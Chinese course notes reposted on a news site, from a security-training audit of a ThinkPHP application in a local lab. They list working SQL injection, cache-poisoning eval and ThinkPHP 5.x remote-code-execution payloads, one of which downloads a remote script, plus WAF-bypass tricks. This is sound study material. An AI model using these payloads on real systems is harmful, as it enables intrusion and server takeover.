DAY113代码审计-PHPTP框架微P系统漏审项目等

news/2024/11/16 23:35:28/

一、环境安装

导入数据

Debug

版本信息收集

一、不安全写法的sql注入(拼接写法绕过预编译机制)

1、Good.php的不安全写法

2、查找可以参数

3、找路由关系

application/index/controller/Goods.php

http://172.19.1.236:8833/index.php/index/goods/ajaxkdata/pid/6 and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23

application/common.php

二、版本漏洞

1、5.x全版本的sql漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/test?username=) union select updatexml(1,concat(0x7,user(),0x7e),1)%23

产品未找到该用法

2、文件包含

渲染页面值

http://172.19.1.236:8833/index.php/index/xiaodi/include_test?cacheFile=1.html

页面渲染

3、缓存漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/index?username=mochazz123%0d%0a@eval($_GET[_]);//*

4、命令执行

waf对eval进行了拦截

禁止了assert函数对eval函数后面的括号进行了正则过滤

对file\_get\_contents函数后面的括号进行了正则过滤

    http://www.0-sec.org/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5、xss漏洞

用户名存在xss

6、验证登录token值固定


http://www.ppmy.cn/news/1547569.html

相关文章

MathGPT的原理介绍,在中小学数学教学的应用场景,以及代码样例实现

MathGPT的原理介绍,在中小学数学教学的应用场景,以及代码样例实现

大家好&#xff0c;我是微学AI&#xff0c;今天给大家介绍一下MathGPT的原理介绍&#xff0c;在中小学数学教学的应用场景&#xff0c;以及代码样例实现。MathGPT的核心架构是一个精心设计的多层次系统&#xff0c;旨在有效处理复杂的数学问题。其主要组成部分包括 数学知识图谱…
阅读更多...
django入门【05】模型介绍(二)——字段选项

django入门【05】模型介绍(二)——字段选项

文章目录 1、null 和 blank示例说明⭐ null 和 blank 结合使用的几种情况总结&#xff1a; 2、choices**choices 在 Django 中有以下几种形式&#xff1a;**&#xff08;1&#xff09; **简单的列表或元组形式**&#xff08;2&#xff09; **字典映射形式**&#xff08;3&#…
阅读更多...
Java之JDBC,Maven,MYBatis

Java之JDBC,Maven,MYBatis

前言 就是用来操作数据库的 1.JDBC快速入门 注意在使用前一定要导入jar包 在模块那里新建目录&#xff0c;新建lib&#xff0c;粘贴复制jar包&#xff0c;我这个jar设置的是模块有效 package test1017;import java.sql.Connection; import java.sql.DriverManager; import…
阅读更多...
【Linux】多线程(中)

【Linux】多线程(中)

目录 一、线程互斥 1.1 互斥概念 1.2 互斥量mutex 1.3 互斥量相关API &#xff08;1&#xff09;初始化互斥量 &#xff08;2&#xff09;销毁互斥量 &#xff08;3&#xff09;互斥量加锁和解锁 1.4 互斥量原理 1.5 重入和线程安全 二、死锁 2.1 概念 2.2 造成死锁…
阅读更多...
网约车管理:规范发展,保障安全与便捷

网约车管理:规范发展,保障安全与便捷

在数字化时代&#xff0c;网约车已成为城市出行的重要组成部分&#xff0c;为公众提供了前所未有的便捷性。然而&#xff0c;随着网约车行业的迅猛发展&#xff0c;一系列管理问题也随之浮现&#xff0c;如司机资质审核不严、车辆安全标准不一、乘客权益保护不足等。这些问题不…
阅读更多...
c++写一个死锁并且自己解锁

c++写一个死锁并且自己解锁

刷算法题&#xff1a; 第一遍&#xff1a;1.看5分钟&#xff0c;没思路看题解 2.通过题解改进自己的解法&#xff0c;并且要写每行的注释以及自己的思路。 3.思考自己做到了题解的哪一步&#xff0c;下次怎么才能做对(总结方法) 4.整理到自己的自媒体平台。 5.再刷重复的类…
阅读更多...
2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备&#xff08;同一个网段下&#xff0c;我是桥接的虚拟机&#xff09; 一、bash反弹shell 二、python反弹shell 三、nc反弹shell 四、villain反弹shell 实验环境准备&#xff08;同一个网段下&#xff0c;我是桥接的虚拟机&#xff09; 一台kali的linux(攻击者)…
阅读更多...
比特大陆/算能科技嵌入式面试题及参考答案

比特大陆/算能科技嵌入式面试题及参考答案

请描述 ubuntu 系统启动的过程。 当按下计算机电源按钮后,计算机硬件开始自检,这个过程是由 BIOS(或 UEFI)来执行的。BIOS 会检查硬件设备是否正常工作,如内存、硬盘等。之后,BIOS 会按照预设的启动顺序查找可引导的设备。 一旦找到包含 Ubuntu 系统的存储设备(如硬盘)…
阅读更多...
最新文章

Copyright @ 2022~2023